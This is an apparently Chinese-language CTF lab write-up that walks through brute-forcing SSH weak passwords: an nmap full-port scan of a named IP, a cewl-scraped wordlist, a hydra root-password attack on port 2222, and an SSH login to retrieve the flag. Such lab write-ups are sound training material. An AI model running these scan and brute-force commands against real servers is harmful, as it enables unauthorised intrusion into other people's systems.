ssh弱口令爆破远程登录渗透过程

记一次ssh弱口令爆破远程登录渗透过程

声明:

实验环境由合天网安实验室和蚁景网安提供

服务器为私人服务器

题目展示

题目:强行突破

渗透核心是信息搜所以集先进行信息搜集

1.nmap扫描

1
nmap -sT -T4 -A -p- 139.155.49.43

nmap常用命令

简单介绍以下

  • -sT Tcp连接
  • -T 时间优化(0-5)(paranoid|sneaky|polite|normal|aggressive|insane) -T4第五个等级
  • -A 综合扫描

nmap扫描完发现能利用的端口只有ssh了

image-20201219193044690.png

2.爬取ssh密码字典再利用hydra爆破

密码字典生成器

可以根据一些信息定制一些弱口令

下面是两个fuzz字典

https://github.com/TheKingOfDuck/fuzzDicts

https://github.com/fuzzdb-project/fuzzdb

我们这里使用的是 Cewl 进行网站爬取字典,因为题目中提示了 https://www.hetianlab.com/

然后使用hydra进行爆破

cewl使用指南

1
cewl -d 2 -m 5 -w word.txt https://www.hetianlab.com 

Snipaste_2020-12-19_20-05-47.png

打开字典 发现有很多但是有很多中文,所以使用正则删掉爬取到的中文

Snipaste_2020-12-19_20-06-50.png

双字节匹配[^\x00-\xff] 删除中文

Snipaste_2020-12-19_20-10-24.png

然后再 \n 匹配所有换行符并且删除就得到了正常的字典

接下来使用hydra进行ssh爆破

hydra常用命令

1
hydra -l root -P word.txt 139.155.49.43 -s 2222 -f ssh

这里 用户用的是root,不知道用户名的可以使用 -L选择常见用户名的字典进行爆破

Snipaste_2020-12-19_20-26-20.png

可以看到我们成功爆出了它服务器得到密码

3.远程登录获取flag

知道用户名和密码了,进行远程登录

1
ssh root@139.155.49.43 -p 2222

可以看到我们成功获得了flag

Snipaste_2020-12-19_20-32-36.png

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 Wh1tecell
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~